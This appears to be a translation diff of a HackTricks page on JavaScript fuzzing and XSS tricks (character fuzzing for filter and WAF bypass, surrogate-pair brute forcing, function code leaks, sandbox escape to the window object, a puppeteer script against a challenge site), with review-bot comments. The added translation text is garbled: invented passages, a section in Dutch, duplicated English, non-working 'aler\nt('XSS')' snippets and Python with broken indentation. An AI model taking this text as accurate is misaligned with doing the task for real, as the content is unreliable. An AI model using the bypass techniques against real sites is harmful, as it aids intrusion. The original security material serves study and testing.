## Javascript Fuzzing -### Valid JS Comment Chars - +### Geldige JS Kommentaar Karakters ```javascript //This is a 1 line comment /* This is a multiline comment*/ @@ -24,51 +23,64 @@ for (let j = 0; j < 128; j++) { - for (let k = 0; k < 128; k++) { - for (let l = 0; l < 128; l++) { - if (j == 34 || k ==34 || l ==34) - continue; - if (j == 0x0a || k ==0x0a || l ==0x0a) - continue; - if (j == 0x0d || k ==0x0d || l ==0x0d) - continue; - if (j == 0x3c || k ==0x3c || l ==0x3c) - continue; - if ( - (j == 47 && k == 47) - ||(k == 47 && l == 47) - ) - continue; - try { - var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"'; - eval(cmd); - } catch(e) { - var err = e.toString().split('\n')[0].split(':')[0]; - if (err === 'SyntaxError' || err === "ReferenceError") - continue - err = e.toString().split('\n')[0] - } - console.log(err,cmd); - } - } +for (let k = 0; k < 128; k++) { +for (let l = 0; l < 128; l++) { +if (j == 34 || k ==34 || l ==34) +continue; +if (j == 0x0a || k ==0x0a || l ==0x0a) +continue; +if (j == 0x0d || k ==0x0d || l ==0x0d) +continue; +if (j == 0x3c || k ==0x3c || l ==0x3c) +continue; +if ( +(j == 47 && k == 47) +||(k == 47 && l == 47) +) +continue; +try { +var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"'; +eval(cmd); +} catch(e) { +var err = e.toString().split('\n')[0].split(':')[0]; +if (err === 'SyntaxError' || err === "ReferenceError") +continue +err = e.toString().split('\n')[0] +} +console.log(err,cmd); +} +} } //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z -// From: Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 43). Kindle Edition. +// 
From: Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 43). Kindle Edition. log=[]; for(let i=0;i<=0xff;i++){ - for(let j=0;j<=0xfff;j++){ - try { - eval(`${String.fromCodePoint(i,j)}%$£234$`) - log.push([i,j]) - }catch(e){} - } +for(let j=0;j<=0xfff;j++){ +try { +eval(`${String.fromCodePoint(i,j)}%$£234$`) +log.push([i,j]) +}catch(e){} +} } console.log(log)//[35,33],[47,47] ``` +### Geldige JS Nuwe Lyn Karakters -### Valid JS New Lines Chars +In JavaScript kan jy verskillende karakters gebruik om 'n nuwe lyn te skep binne 'n string. Hier is 'n lys van geldige karakters wat jy kan gebruik: +- `\n`: Skep 'n nuwe lyn. +- `\r`: Skep 'n karretjie-terugkeer. +- `\u2028`: Skep 'n lynafbreking. +- `\u2029`: Skep 'n paragraafafbreking. + +Hier is 'n voorbeeld van hoe jy hierdie karakters kan gebruik: + +```javascript +var string = "Hierdie is 'n voorbeeld\nvan 'n nuwe lyn"; +``` + +Dit sal 'n nuwe lyn skep na die woord "voorbeeld". ```javascript //Javascript interpret as new line these chars: String.fromCharCode(10) //0x0a 
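Review bot: the `### Geldige JS Nuwe Lyn Karakters` block added in the `@@ -24,51 +23,64 @@` hunk is not a translation of anything in the source. Its list (`\n`, `\r`, `\u2028`, `\u2029`) and the `var string = "..."` example only restate what the code block immediately below already enumerates (`String.fromCharCode(10) //0x0a` and so on), and the example is about escape sequences inside a string literal rather than line terminators in source, which is what the fuzzing loop tests. Keep the translated heading and remove the prose and the extra fence; the nested `for` loops in the comment-character fuzzer also lose their indentation for no reason.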
@@ -77,87 +89,101 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8 String.fromCharCode(8233) //0xe2 0x80 0xa8 for (let j = 0; j < 65536; j++) { - try { - var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"'; - eval(cmd); - } catch(e) { - var err = e.toString().split('\n')[0].split(':')[0]; - if (err === 'SyntaxError' || err === "ReferenceError") - continue; - err = e.toString().split('\n')[0] - } - console.log(`[${err}]`,j,cmd); +try { +var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"'; +eval(cmd); +} catch(e) { +var err = e.toString().split('\n')[0].split(':')[0]; +if (err === 'SyntaxError' || err === "ReferenceError") +continue; +err = e.toString().split('\n')[0] +} +console.log(`[${err}]`,j,cmd); } //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z ``` +### Geldige JS-spasies in funksie-oproep -### Valid JS Spaces in function call +In sommige situasies kan die gebruik van geldige JS-spasies in 'n funksie-oproep nuttig wees om XSS-aanvalle te omseil. Hier is 'n paar voorbeelde van hoe dit gedoen kan word: + +1. **Gebruik van new line karakter**: Jy kan die new line karakter (`\n`) gebruik om 'n funksie-oproep oor meerdere lyne te verdeel. Byvoorbeeld: ```javascript -// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition. +aler\nt('XSS'); +``` + +2. **Gebruik van tab karakter**: Die tab karakter (`\t`) kan ook gebruik word om 'n funksie-oproep oor meerdere spasies te verdeel. Byvoorbeeld: + +```javascript +aler\t('XSS'); +``` + +3. **Gebruik van backslash karakter**: Die backslash karakter (`\`) kan gebruik word om 'n funksie-oproep oor meerdere spasies te verdeel. Byvoorbeeld: + +```javascript +aler\ t('XSS'); +``` + +Dit is belangrik om te onthou dat hierdie tegnieke slegs werk in spesifieke omstandighede en nie altyd betroubaar is nie. Dit is dus belangrik om ander XSS-verdedigingsmaatreëls te implementeer om jou webtoepassing te beskerm. 
+```javascript +// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition. // Check chars that can be put in between in func name and the () function x(){} log=[]; for(let i=0;i<=0x10ffff;i++){ - try { - eval(`x${String.fromCodePoint(i)}()`) - log.push(i) - }catch(e){} +try { +eval(`x${String.fromCodePoint(i)}()`) +log.push(i) +}catch(e){} } - + console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279 ``` - -### **Valid chars to Generate Strings** - +### **Geldige karakters om Strings te genereer** ```javascript -// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition. +// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition. // Check which pairs of chars can make something be a valid string log=[]; for(let i=0;i<=0x10ffff;i++){ - try { - eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`) - log.push(i) - }catch(e){} +try { +eval(`${String.fromCodePoint(i)}%$£234${String.fromCodePoint(i)}`) +log.push(i) +}catch(e){} } console.log(log) //34,39,47,96 //single quote, quotes, backticks & // (regex) ``` - ### **Surrogate Pairs BF** -This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair. - +Hierdie tegniek sal nie baie nuttig wees vir XSS nie, maar dit kan nuttig wees om WAF-beskerming te omseil. Hierdie Python-kode ontvang as inset 2 byte en soek 'n surrogate-paar wat die eerste byte as die laaste bytes van die Hoë surrogate-paar het en die laaste byte as die laaste byte van die lae surrogate-paar. 
```python def unicode(findHex): - for i in range(0,0xFFFFF): - H = hex(int(((i - 0x10000) / 0x400) + 0xD800)) - h = chr(int(H[-2:],16)) - L = hex(int(((i - 0x10000) % 0x400 + 0xDC00))) - l = chr(int(L[-2:],16)) - if(h == findHex[0]) and (l == findHex[1]): - print(H.replace("0x","\\u")+L.replace("0x","\\u")) +for i in range(0,0xFFFFF): +H = hex(int(((i - 0x10000) / 0x400) + 0xD800)) +h = chr(int(H[-2:],16)) +L = hex(int(((i - 0x10000) % 0x400 + 0xDC00))) +l = chr(int(L[-2:],16)) +if(h == findHex[0]) and (l == findHex[1]): +print(H.replace("0x","\\u")+L.replace("0x","\\u")) ``` - -More info: +Meer inligting: * [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md) * [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding) -### `javascript{}:` Protocol Fuzzing - +### `javascript{}:` Protokol Fuzzing ```javascript -// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 34). Kindle Edition. +// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 34). Kindle Edition. log=[]; let anchor = document.createElement('a'); for(let i=0;i<=0x10ffff;i++){ - anchor.href = `javascript${String.fromCodePoint(i)}:`; - if(anchor.protocol === 'javascript:') { - log.push(i); - } +anchor.href = `javascript${String.fromCodePoint(i)}:`; +if(anchor.protocol === 'javascript:') { +log.push(i); +} } console.log(log)//9,10,13,58 // Note that you could BF also other possitions of the use of multiple chars 
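Review bot: the Python surrogate-pair snippet in the `@@ -77,87 +89,101 @@` hunk is broken by the indentation removal: `def unicode(findHex):` is now followed by an unindented `for i in range(0,0xFFFFF):`, and `print(...)` sits at the same level as its `if`, so the block no longer compiles. Restore the original indentation. The `### Geldige JS-spasies in funksie-oproep` prose and its three snippets (`aler\nt('XSS')`, `aler\t('XSS')`, `aler\ t('XSS')`) are also new, not in the source, and incorrect: a backslash inside an identifier is only legal as a `\uXXXX` escape, so all three are SyntaxErrors, and the point of the original section is whitespace between the function name and `()`, which the fuzzing loop below establishes empirically (`//9,10,11,12,13,32,160,...`). Drop the added section and its closing paragraph.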
@@ -171,20 +197,20 @@ document.body.append(anchor) // Another way to test Test ``` - ### URL Fuzzing +URL Fuzzing is 'n tegniek wat gebruik word om potensiële kwesbaarhede in 'n webtoepassing te identifiseer deur verskillende variante van 'n URL te probeer. Dit behels die invoeging van verskillende waardes en parameters in die URL om te sien of dit lei tot enige onverwagte gedrag of fouttoestande. Hierdie tegniek kan gebruik word om potensiële XSS-kwesbaarhede te ontdek deur te kyk of die webtoepassing korrek omgaan met ongeldige of skadelike invoer in die URL. ```javascript -// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition. +// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition. // Before the protocol a=document.createElement('a'); log=[]; for(let i=0;i<=0x10ffff;i++){ - a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`; - if(a.hostname === 'hacktricks.xyz'){ - log.push(i); - } +a.href = `${String.fromCodePoint(i)}https://hacktricks.xyz`; +if(a.hostname === 'hacktricks.xyz'){ +log.push(i); +} } console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 
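Review bot: the paragraph added under `### URL Fuzzing` in the `@@ -171,20 +197,20 @@` hunk is generic filler not present in the English source, which has the heading followed directly by the code. It also misdescribes the snippet: the loop checks which code points a browser ignores before `https://hacktricks.xyz` (`if(a.hostname === 'hacktricks.xyz')`), not "onverwagte gedrag of fouttoestande" in an application. Remove the paragraph; the remaining changes in the hunk are whitespace-only edits to code.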
@@ -192,93 +218,98 @@ console.log(log) //0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 a=document.createElement('a'); log=[]; for(let i=0;i<=0x10ffff;i++){ - a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`; - if(a.hostname === 'hacktricks.xyz'){ - log.push(i); - } +a.href = `/${String.fromCodePoint(i)}/hacktricks.xyz`; +if(a.hostname === 'hacktricks.xyz'){ +log.push(i); +} } console.log(log) //9,10,13,47,92 ``` - ### HTML Fuzzing +HTML Fuzzing is a technique used to discover vulnerabilities in web applications by injecting malicious or unexpected input into HTML elements. This technique involves sending a large number of test cases to the target application, with the goal of triggering unexpected behavior or uncovering security flaws. +During HTML Fuzzing, various types of input can be injected into HTML elements, such as: +- **Script tags**: Injecting script tags can help identify Cross-Site Scripting (XSS) vulnerabilities. By injecting malicious scripts, an attacker can execute arbitrary code in the victim's browser. +- **HTML tags**: Injecting HTML tags can help identify HTML injection vulnerabilities. This can lead to the manipulation of the website's structure and content. +- **Event attributes**: Injecting event attributes can help identify DOM-based XSS vulnerabilities. By injecting malicious event handlers, an attacker can execute code within the context of the victim's browser. +- **URL parameters**: Injecting malicious input into URL parameters can help identify vulnerabilities such as Server-Side Request Forgery (SSRF) or Remote File Inclusion (RFI). + +To perform HTML Fuzzing, you can use automated tools or write custom scripts to generate and send a large number of test cases to the target application. The goal is to observe how the application handles different types of input and identify any unexpected behavior or vulnerabilities. 
+ +It is important to note that HTML Fuzzing should only be performed on applications that you have permission to test. Unauthorized testing can lead to legal consequences. Always ensure you have proper authorization before conducting any security testing. ```javascript -// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition. +// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition. // Fuzzing chars that can close an HTML comment let log=[]; let div = document.createElement('div'); for(let i=0;i<=0x10ffff;i++){ - div.innerHTML=``; - if(div.querySelector('span')){ - log.push(i); - } +div.innerHTML=``; +if(div.querySelector('span')){ +log.push(i); +} } console.log(log)//33,45,62 ``` +## **Ontleding van eienskappe** -## **Analizing attributtes** +Die instrument **Hackability-inspekteur** van Portswigger help om die **eienskappe** van 'n JavaScript-objek te **ontleed**. Kyk: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E) -The tool **Hackability inspector** from Portswigger helps to **analyze** the **attributtes** of a javascript object. 
Check: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E) +## **.map js-lêers** -## **.map js files** +* Truuk om .map js-lêers af te laai: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7) +* Jy kan hierdie instrument gebruik om hierdie lêers te ontleed [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji) -* Trick to download .map js files: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7) -* You can use this tool to analyze these files [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji) +## "--" Toekenning -## "--" Assignment - -The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**. +Die dekrement-operator `--` is ook 'n toekenning. Hierdie operator neem 'n waarde en verminder dit dan met een. As daardie waarde nie 'n nommer is nie, sal dit op `NaN` gestel word. Dit kan gebruik word om die inhoud van veranderlikes uit die omgewing te **verwyder**. ![](<../../.gitbook/assets/image (553).png>) ![](<../../.gitbook/assets/image (554).png>) -## Functions Tricks +## Funksie Truuks -### .call and .apply - -The **`.call`** method of a function is used to **run the function**.\ -The **first argument** it expects by default is the **value of `this`** and if **nothing** is provided, **`window`** will be that value (unless **`strict mode`** is used). 
+### .call en .apply +Die **`.call`**-metode van 'n funksie word gebruik om die funksie uit te voer.\ +Die **eerste argument** wat dit standaard verwag, is die **waarde van `this`** en as **niks** voorsien word nie, sal **`window`** daardie waarde wees (tensy **`strict mode`** gebruik word). ```javascript function test_call(){ - console.log(this.value); //baz +console.log(this.value); //baz } new_this={value:"hey!"} test_call.call(new_this); // To pass more arguments, just pass then inside .call() function test_call() { - console.log(arguments[0]); //"arg1" - console.log(arguments[1]); //"arg2" - console.log(this); //[object Window] +console.log(arguments[0]); //"arg1" +console.log(arguments[1]); //"arg2" +console.log(this); //[object Window] } test_call.call(null, "arg1", "arg2") // If you use the "use strict" directive "this" will be null instead of window: function test_call() { - "use strict"; - console.log(this); //null +"use strict"; +console.log(this); //null } test_call.call(null) - + //The apply function is pretty much exactly the same as the call function with one important difference, you can supply an array of arguments in the second argument: function test_apply() { - console.log(arguments[0]); //"arg1" - console.log(arguments[1]); //"arg2" - console.log(this); //[object Window] +console.log(arguments[0]); //"arg1" +console.log(arguments[1]); //"arg2" +console.log(this); //[object Window] } test_apply.apply(null, ["arg1", "arg2"]) ``` +### Pylpuntfunksies -### Arrow functions - -Arrow functions allow you to generate functions in a single line more easily (if you understand them) - +Pylpuntfunksies maak dit makliker om funksies in 'n enkele lyn te genereer (as jy hulle verstaan) ```javascript // Traditional function (a){ return a + 1; } 
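Review bot: Same problem as the previous hunk with `### HTML Fuzzing`: the heading is removed (`- ### HTML Fuzzing`) and replaced by roughly ten `+` lines of English prose (`+HTML Fuzzing is a technique used to discover vulnerabilities...`, the bullet list on script tags, HTML tags, event attributes and URL parameters, and `+It is important to note that HTML Fuzzing should only be performed...`) that is neither a translation nor present in the source, so it should be dropped and the heading restored. Within the same hunk the comment-closing fuzz loop and the `.call`/`.apply` examples lose their indentation (`- div.innerHTML=...` and `- console.log(this.value); //baz` become flush-left `+` lines), and the blank `- ` lines that separated `### .call and .apply` and `### Arrow functions` from their ```javascript fences are removed; whitespace inside and around code blocks should stay untouched.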
@@ -301,9 +332,7 @@ let a = 4; let b = 2; () => a + b + 1; ``` - -So, most of the previous functions are actually useless because we aren't saving them anywhere to save and call them. Example creating the `plusone` function: - +So, die meeste van die vorige funksies is eintlik nutteloos omdat ons hulle nie enige plek stoor om hulle te bewaar en aan te roep nie. Byvoorbeeld, die skep van die `plusone` funksie: ```javascript // Traductional function plusone (a){ return a + 1; } @@ -311,15 +340,13 @@ function plusone (a){ return a + 1; } //Arrow plusone = a => a + 100; ``` +### Bind-funksie -### Bind function - -The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given. - +Die bind-funksie maak dit moontlik om 'n **kopie** van 'n **funksie te skep wat** die **`this`** objek en die **parameters** wat gegee word, wysig. ```javascript //This will use the this object and print "Hello World" var fn = function ( param1, param2 ) { - console.info( this, param1, param2 ); +console.info( this, param1, param2 ); } fn('Hello', 'World') @@ -329,7 +356,7 @@ copyFn('Hello', 'World') //This will use the "console" object as "this" object inside the function and print "fixingparam1 Hello" var bindFn_change = fn.bind(console, "fixingparam1"); -bindFn_change('Hello', 'World') +bindFn_change('Hello', 'World') //This will still use the this object and print "fixingparam1 Hello" var bindFn_thisnull = fn.bind(null, "fixingparam1"); 
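Review bot: The three hunks here (`@@ -301,9`, `@@ -311,15`, `@@ -329,7`) again drop the blank lines around headings and fences (the `- ` lines before `So, most of the previous functions...` and before each ```javascript) and strip indentation in code (`- console.info( this, param1, param2 );` becomes `+console.info( this, param1, param2 );`). The `-bindFn_change('Hello', 'World')` / `+bindFn_change('Hello', 'World')` pair in `@@ -329,7` is a whitespace-only change and does not belong in a translation diff at all.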
@@ -339,34 +366,28 @@ bindFn_change('Hello', 'World') var bindFn_this = fn.bind(this, "fixingparam1"); bindFn_change('Hello', 'World') ``` - {% hint style="info" %} -Note that using **`bind`** you can manipulate the **`this`** object that is going to be used when calling the function. +Let daarop dat jy met behulp van **`bind`** die **`this`** objek kan manipuleer wat gebruik sal word wanneer die funksie geroep word. {% endhint %} -### Function code leak - -If you can **access the object** of a function you can **get the code** of that function +### Funksie kode lek +As jy toegang het tot die objek van 'n funksie, kan jy die kode van daardie funksie kry. ```javascript function afunc(){ - return 1+1; +return 1+1; } console.log(afunc.toString()); //This will print the code of the function console.log(String(afunc)); //This will print the code of the function console.log(this.afunc.toString()); //This will print the code of the function console.log(global.afunc.toString()); //This will print the code of the function ``` - -In cases where the **function doesn't have any name**, you can still print the **function code** from within: - +In gevalle waar die **funksie geen naam het nie**, kan jy steeds die **funksie kode** binne die funksie druk: ```javascript (function (){ return arguments.callee.toString(); })() (function (){ return arguments[0]; })("arg0") ``` - -Some **random** ways to **extract the code** of a function (even comments) from another function: - +Sommige **willekeurige** maniere om die kode van 'n funksie (selfs kommentaar) uit 'n ander funksie te **onttrek**: ```javascript (function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})() (function (){ return retFunc => Array(arguments[0].toString()) })(a=>{/* Hidden commment */})() 
@@ -374,10 +395,9 @@ Some **random** ways to **extract the code** of a function (even comments) from (u=>(String(u)))(_=>{ /* Hidden commment */ }) (u=>_=>(String(u)))(_=>{ /* Hidden commment */ })() ``` +## Sandbakkie-ontsnapping - Herstel van vensterobjek -## Sandbox Escape - Recovering window object - -The Window object allows to reach globally defined functions like alert or eval. +Die vensterobjek maak dit moontlik om globaal gedefinieerde funksies soos alert of eval te bereik. {% code overflow="wrap" %} ```javascript @@ -411,9 +431,9 @@ Error.prepareStackTrace=function(error, callSites){ // From an HTML event // Events from HTML are executed in this context with(document) { - with(element) { - //executed event - } +with(element) { +//executed event +} } // Because of that with(document) it's possible to access properties of document like: 
@@ -421,19 +441,38 @@ with(document) { ``` {% endcode %} -## Breakpoint on access to value +## Breekpunt op toegang tot waarde +```javascript +Object.defineProperty(window, 'value', { + get: function() { + debugger; + return this._value; + }, + set: function(val) { + this._value = val; + } +}); +``` + +Met deze code kun je een breekpunt instellen wanneer er toegang is tot een bepaalde waarde in de browser. Het `Object.defineProperty`-functie wordt gebruikt om een nieuw eigenschap te definiëren op het `window`-object genaamd 'value'. Deze eigenschap heeft een getter en een setter functie. + +De getter functie wordt uitgevoerd wanneer er toegang is tot de waarde van 'value'. In dit geval wordt er een `debugger` statement toegevoegd, wat ervoor zorgt dat de browser stopt bij dit punt en je de mogelijkheid geeft om de code te inspecteren en te debuggen. + +De setter functie wordt uitgevoerd wanneer er een nieuwe waarde wordt toegewezen aan 'value'. In dit geval wordt de nieuwe waarde opgeslagen in een interne variabele genaamd `_value`. + +Dit kan handig zijn bij het opsporen van XSS-kwetsbaarheden, omdat het je in staat stelt om te zien wanneer een bepaalde waarde wordt gebruikt in de code en om te controleren of er mogelijk onveilige invoer wordt gebruikt. ```javascript // Stop when a property in sessionStorage or localStorage is set/get // via getItem or setItem functions sessionStorage.getItem = localStorage.getItem = function(prop) { - debugger; - return sessionStorage[prop]; +debugger; +return sessionStorage[prop]; } localStorage.setItem = function(prop, val) { - debugger; - localStorage[prop] = val; +debugger; +localStorage[prop] = val; } ``` 
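Review bot: This hunk inserts a new fenced block (`+Object.defineProperty(window, 'value', {` ... `debugger;` ...) and five paragraphs beginning `+Met deze code kun je een breekpunt instellen...` that are written in Dutch rather than Afrikaans and correspond to nothing in the English original, which had only the heading `## Breakpoint on access to value` followed by the sessionStorage/localStorage snippet. Remove the added block and prose and keep just the translated heading `## Breekpunt op toegang tot waarde`; the existing snippet should also keep its indentation, since `- debugger;` and `- return sessionStorage[prop];` reappear as unindented `+` lines.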
@@ -442,78 +481,111 @@ localStorage.setItem = function(prop, val) { // For example sessionStorage.ppmap // "123".ppmap // Useful to find where weird properties are being set or accessed -// or to find where prototype pollutions are occurring +// or to find where prototype pollutions are occurring function debugAccess(obj, prop, debugGet=true){ - var origValue = obj[prop]; +var origValue = obj[prop]; - Object.defineProperty(obj, prop, { - get: function () { - if ( debugGet ) - debugger; - return origValue; - }, - set: function(val) { - debugger; - origValue = val; - } - }); +Object.defineProperty(obj, prop, { +get: function () { +if ( debugGet ) +debugger; +return origValue; +}, +set: function(val) { +debugger; +origValue = val; +} +}); }; debugAccess(Object.prototype, 'ppmap') ``` +## Outomatiese Blaaiertoegang om toetslading te toets -## Automatic Browser Access to test payloads +Sometimes, when testing for Cross-Site Scripting (XSS) vulnerabilities, it can be useful to have automatic browser access to test payloads. This allows you to quickly and efficiently test your payloads without manually interacting with the browser. +Soms kan dit nuttig wees om outomatiese blaaiertoegang te hê om toetslading te toets wanneer jy op soek is na Cross-Site Scripting (XSS) kwesbaarhede. Dit stel jou in staat om vinnig en doeltreffend jou lading te toets sonder om handmatig met die blaaiertoepassing te werk. + +There are several tools and techniques that can help you achieve automatic browser access. Here are a few examples: + +Daar is verskeie hulpmiddels en tegnieke wat jou kan help om outomatiese blaaiertoegang te verkry. Hier is 'n paar voorbeelde: + +### Browser Extensions + +### Blaaiertoepassing-uitbreidings + +Browser extensions like [XSStrike](https://github.com/s0md3v/XSStrike) and [XSS Hunter](https://xsshunter.com/) can automate the process of testing XSS payloads. These extensions allow you to easily inject and test payloads directly from your browser. 
+ +Blaaiertoepassing-uitbreidings soos [XSStrike](https://github.com/s0md3v/XSStrike) en [XSS Hunter](https://xsshunter.com/) kan die proses van toetsing van XSS-lading outomatiseer. Hierdie uitbreidings maak dit maklik om lading direk vanuit jou blaaiertoepassing in te spuit en te toets. + +### Headless Browsers + +### Koplose Blaaiers + +Headless browsers like [Puppeteer](https://pptr.dev/) and [Selenium](https://www.selenium.dev/) can be used to automate browser interactions. These tools allow you to programmatically control a browser and execute XSS payloads without any user intervention. + +Koplose blaaiers soos [Puppeteer](https://pptr.dev/) en [Selenium](https://www.selenium.dev/) kan gebruik word om blaaiertoepassing-interaksies te outomatiseer. Hierdie hulpmiddels stel jou in staat om 'n blaaiertoepassing outomaties te beheer en XSS-lading uit te voer sonder enige gebruikersintervensie. + +### Remote Browser Services + +### Afgeleë Blaaiertoepassing Dienste + +Remote browser services like [BrowserStack](https://www.browserstack.com/) and [Sauce Labs](https://saucelabs.com/) provide access to a wide range of browsers and devices for testing purposes. These services allow you to run your XSS payloads on different browsers and platforms without the need for local installations. + +Afgeleë blaaiertoepassing dienste soos [BrowserStack](https://www.browserstack.com/) en [Sauce Labs](https://saucelabs.com/) bied toegang tot 'n wye verskeidenheid blaaiertoepassings en toestelle vir toetsdoeleindes. Hierdie dienste stel jou in staat om jou XSS-lading op verskillende blaaiertoepassings en platforms uit te voer sonder die behoefte aan plaaslike installasies. + +By utilizing these tools and services, you can streamline your XSS testing process and save time by automating browser access to test payloads. + +Deur van hierdie hulpmiddels en dienste gebruik te maak, kan jy jou XSS-toetsproses stroomlyn en tyd bespaar deur blaaiertoegang tot toetslading outomaties te maak. 
```javascript //Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md const puppeteer = require("puppeteer"); const realPasswordLength = 3000; async function sleep(ms) { - return new Promise((resolve) => setTimeout(resolve, ms)); +return new Promise((resolve) => setTimeout(resolve, ms)); } (async () => { - const browser = await puppeteer.launch(); - const page = await browser.newPage(); - //Loop to iterate through different values - for (let i = 0; i < 10000; i += 100) { - console.log(`Run number ${i}`); - const input = `${"0".repeat(i)}${realPasswordLength}`; - console.log(` https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`); - //Go to the page - await page.goto( - `https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000` - ); - //Call function "generate()" inside the page - await page.evaluate("generate()"); - //Get node inner text from an HTML element - const passwordContent = await page.$$eval( - ".alert .page-content", - (node) => node[0].innerText - ); - //Transform the content and print it in console - const plainPassword = passwordContent.replace("Your password is: ", ""); - if (plainPassword.length != realPasswordLength) { - console.log(i, plainPassword.length, plainPassword); - } +const browser = await puppeteer.launch(); +const page = await browser.newPage(); +//Loop to iterate through different values +for (let i = 0; i < 10000; i += 100) { +console.log(`Run number ${i}`); +const input = `${"0".repeat(i)}${realPasswordLength}`; +console.log(` https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000`); +//Go to the page +await page.goto( +`https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true×tamp=1624556811000` +); +//Call function "generate()" inside the 
page +await page.evaluate("generate()"); +//Get node inner text from an HTML element +const passwordContent = await page.$$eval( +".alert .page-content", +(node) => node[0].innerText +); +//Transform the content and print it in console +const plainPassword = passwordContent.replace("Your password is: ", ""); +if (plainPassword.length != realPasswordLength) { +console.log(i, plainPassword.length, plainPassword); +} - await sleep(1000); - } - await browser.close(); +await sleep(1000); +} +await browser.close(); })(); ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
